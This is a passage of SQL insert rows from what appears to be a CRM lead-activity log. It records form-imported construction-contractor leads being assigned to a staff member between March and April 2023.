(398, 193, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-25 11:04:45', 0, '[CRON]', 0),
(399, 194, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-25 16:08:42', 0, '[CRON]', 0),
(400, 194, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-25 16:08:42', 0, '[CRON]', 0),
(401, 195, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-25 16:09:20', 0, '[CRON]', 0),
(402, 195, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-25 16:09:20', 0, '[CRON]', 0),
(403, 196, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-25 16:10:11', 0, '[CRON]', 0),
(404, 196, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-25 16:10:11', 0, '[CRON]', 0),
(405, 197, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-25 16:10:52', 0, '[CRON]', 0),
(406, 197, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-25 16:10:52', 0, '[CRON]', 0),
(407, 198, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-27 09:19:19', 0, '[CRON]', 0),
(408, 198, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-27 09:19:19', 0, '[CRON]', 0),
(409, 199, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-27 09:19:52', 0, '[CRON]', 0),
(410, 199, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-27 09:19:52', 0, '[CRON]', 0),
(411, 200, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-27 09:20:14', 0, '[CRON]', 0),
(412, 200, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-27 09:20:14', 0, '[CRON]', 0),
(413, 201, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-27 09:21:00', 0, '[CRON]', 0),
(414, 201, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-27 09:21:00', 0, '[CRON]', 0),
(415, 202, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-27 11:56:25', 0, '[CRON]', 0),
(416, 202, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-27 11:56:25', 0, '[CRON]', 0),
(417, 203, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-27 11:56:52', 0, '[CRON]', 0),
(418, 203, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-27 11:56:52', 0, '[CRON]', 0),
(419, 204, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-27 11:57:17', 0, '[CRON]', 0),
(420, 204, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-27 11:57:17', 0, '[CRON]', 0),
(421, 205, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-27 11:57:43', 0, '[CRON]', 0),
(422, 205, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-27 11:57:43', 0, '[CRON]', 0),
(423, 206, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-27 11:59:09', 0, '[CRON]', 0),
(424, 206, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-27 11:59:09', 0, '[CRON]', 0),
(425, 207, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-27 11:59:48', 0, '[CRON]', 0),
(426, 207, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-27 11:59:48', 0, '[CRON]', 0),
(427, 208, 'not_lead_imported_from_form', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-03-28 09:11:34', 0, '[CRON]', 0),
(428, 208, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-28 09:11:34', 0, '[CRON]', 0),
(429, 209, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-28 10:08:07', 0, '[CRON]', 0),
(430, 209, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-28 10:08:07', 0, '[CRON]', 0),
(431, 210, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-28 10:08:39', 0, '[CRON]', 0),
(432, 210, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-28 10:08:39', 0, '[CRON]', 0),
(435, 212, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-28 10:09:56', 0, '[CRON]', 0),
(436, 212, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-28 10:09:56', 0, '[CRON]', 0),
(437, 213, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-28 13:43:29', 0, '[CRON]', 0),
(438, 213, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-28 13:43:29', 0, '[CRON]', 0),
(439, 214, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-28 13:43:53', 0, '[CRON]', 0),
(440, 214, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-28 13:43:53', 0, '[CRON]', 0),
(443, 216, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-28 13:44:42', 0, '[CRON]', 0),
(444, 216, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-28 13:44:42', 0, '[CRON]', 0),
(445, 217, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-28 13:45:23', 0, '[CRON]', 0),
(446, 217, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-28 13:45:23', 0, '[CRON]', 0),
(447, 218, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-28 13:46:04', 0, '[CRON]', 0),
(448, 218, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-28 13:46:04', 0, '[CRON]', 0),
(449, 219, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-28 13:46:59', 0, '[CRON]', 0),
(450, 219, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-28 13:46:59', 0, '[CRON]', 0),
(451, 220, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-29 09:05:27', 0, '[CRON]', 0),
(452, 220, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-29 09:05:27', 0, '[CRON]', 0),
(453, 221, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-29 09:06:09', 0, '[CRON]', 0),
(454, 221, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-29 09:06:09', 0, '[CRON]', 0),
(455, 222, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-29 09:06:44', 0, '[CRON]', 0),
(456, 222, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-29 09:06:44', 0, '[CRON]', 0),
(457, 223, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-29 10:15:07', 0, '[CRON]', 0),
(458, 223, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-29 10:15:07', 0, '[CRON]', 0),
(459, 224, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-29 10:15:55', 0, '[CRON]', 0),
(460, 224, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-29 10:15:55', 0, '[CRON]', 0),
(461, 225, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-29 10:16:19', 0, '[CRON]', 0),
(462, 225, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-29 10:16:19', 0, '[CRON]', 0),
(463, 226, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-29 10:16:49', 0, '[CRON]', 0),
(464, 226, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-29 10:16:49', 0, '[CRON]', 0),
(465, 227, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-29 10:17:11', 0, '[CRON]', 0),
(466, 227, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-29 10:17:11', 0, '[CRON]', 0),
(467, 228, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-29 10:17:37', 0, '[CRON]', 0),
(468, 228, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-29 10:17:37', 0, '[CRON]', 0),
(469, 229, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-29 10:18:02', 0, '[CRON]', 0),
(470, 229, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-29 10:18:02', 0, '[CRON]', 0),
(473, 231, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-30 09:23:18', 0, '[CRON]', 0),
(474, 231, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-30 09:23:18', 0, '[CRON]', 0),
(475, 232, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-30 09:23:50', 0, '[CRON]', 0),
(476, 232, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-30 09:23:50', 0, '[CRON]', 0),
(477, 233, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-30 09:24:18', 0, '[CRON]', 0),
(478, 233, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-30 09:24:18', 0, '[CRON]', 0),
(479, 234, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-30 09:24:58', 0, '[CRON]', 0),
(480, 234, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-30 09:24:58', 0, '[CRON]', 0),
(481, 235, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-30 09:25:28', 0, '[CRON]', 0),
(482, 235, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-30 09:25:28', 0, '[CRON]', 0),
(483, 236, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-30 09:25:51', 0, '[CRON]', 0),
(484, 236, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-30 09:25:51', 0, '[CRON]', 0),
(485, 237, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-30 09:26:16', 0, '[CRON]', 0),
(486, 237, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-30 09:26:16', 0, '[CRON]', 0),
(487, 238, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-30 09:26:53', 0, '[CRON]', 0),
(488, 238, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-30 09:26:53', 0, '[CRON]', 0),
(489, 239, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-30 09:27:40', 0, '[CRON]', 0),
(490, 239, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-30 09:27:40', 0, '[CRON]', 0),
(491, 240, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-30 09:28:06', 0, '[CRON]', 0),
(492, 240, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-30 09:28:06', 0, '[CRON]', 0),
(493, 241, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-30 09:29:21', 0, '[CRON]', 0),
(494, 241, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-30 09:29:21', 0, '[CRON]', 0),
(495, 242, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-31 10:11:08', 0, '[CRON]', 0),
(496, 242, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-31 10:11:08', 0, '[CRON]', 0),
(497, 243, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-31 10:11:27', 0, '[CRON]', 0),
(498, 243, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-31 10:11:27', 0, '[CRON]', 0),
(499, 244, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-31 10:11:51', 0, '[CRON]', 0),
(500, 244, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-31 10:11:51', 0, '[CRON]', 0),
(501, 245, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-31 10:12:11', 0, '[CRON]', 0),
(502, 245, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-31 10:12:11', 0, '[CRON]', 0),
(503, 246, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-31 10:12:29', 0, '[CRON]', 0),
(504, 246, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-31 10:12:29', 0, '[CRON]', 0),
(505, 247, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-31 14:28:52', 0, '[CRON]', 0),
(506, 247, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-31 14:28:52', 0, '[CRON]', 0),
(507, 248, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-31 14:29:11', 0, '[CRON]', 0),
(508, 248, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-31 14:29:11', 0, '[CRON]', 0),
(509, 249, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-31 14:29:36', 0, '[CRON]', 0),
(510, 249, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-31 14:29:36', 0, '[CRON]', 0),
(513, 251, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-31 14:30:26', 0, '[CRON]', 0),
(514, 251, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-31 14:30:27', 0, '[CRON]', 0),
(515, 252, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-04 09:23:22', 0, '[CRON]', 0),
(516, 252, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-04 09:23:22', 0, '[CRON]', 0),
(517, 253, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-04 09:23:48', 0, '[CRON]', 0),
(518, 253, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-04 09:23:48', 0, '[CRON]', 0),
(519, 254, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-04 09:24:11', 0, '[CRON]', 0),
(520, 254, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-04 09:24:11', 0, '[CRON]', 0),
(521, 255, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-04 09:24:49', 0, '[CRON]', 0),
(522, 255, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-04 09:24:49', 0, '[CRON]', 0),
(523, 256, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-04 09:25:08', 0, '[CRON]', 0),
(524, 256, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-04 09:25:08', 0, '[CRON]', 0),
(525, 257, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-04 09:25:46', 0, '[CRON]', 0),
(526, 257, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-04 09:25:46', 0, '[CRON]', 0),
(527, 258, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-04 09:26:10', 0, '[CRON]', 0),
(528, 258, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-04 09:26:10', 0, '[CRON]', 0),
(529, 259, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-04 09:53:10', 0, '[CRON]', 0),
(530, 259, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-04 09:53:10', 0, '[CRON]', 0),
(531, 260, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-05 09:47:20', 0, '[CRON]', 0),
(532, 260, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-05 09:47:21', 0, '[CRON]', 0),
(533, 261, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-05 09:47:44', 0, '[CRON]', 0),
(534, 261, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-05 09:47:44', 0, '[CRON]', 0),
(535, 262, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-05 09:48:05', 0, '[CRON]', 0),
(536, 262, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-05 09:48:05', 0, '[CRON]', 0),
(537, 263, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-05 09:48:22', 0, '[CRON]', 0),
(538, 263, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-05 09:48:23', 0, '[CRON]', 0),
(539, 264, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-05 13:30:02', 0, '[CRON]', 0),
(540, 264, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-05 13:30:02', 0, '[CRON]', 0),
(541, 265, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-05 13:30:25', 0, '[CRON]', 0),
(542, 265, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-05 13:30:25', 0, '[CRON]', 0),
(543, 266, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-05 13:30:55', 0, '[CRON]', 0),
(544, 266, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-05 13:30:55', 0, '[CRON]', 0),
(545, 267, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-05 13:31:44', 0, '[CRON]', 0),
(546, 267, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-05 13:31:44', 0, '[CRON]', 0),
(547, 268, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-05 13:32:25', 0, '[CRON]', 0),
(548, 268, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-05 13:32:25', 0, '[CRON]', 0),
(549, 269, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-05 13:32:50', 0, '[CRON]', 0),
(550, 269, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-05 13:32:50', 0, '[CRON]', 0),
(555, 272, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-06 09:14:38', 0, '[CRON]', 0),
(556, 272, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-06 09:14:39', 0, '[CRON]', 0),
(557, 273, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-06 09:15:13', 0, '[CRON]', 0),
(558, 273, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-06 09:15:13', 0, '[CRON]', 0),
(559, 274, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-06 09:15:37', 0, '[CRON]', 0),
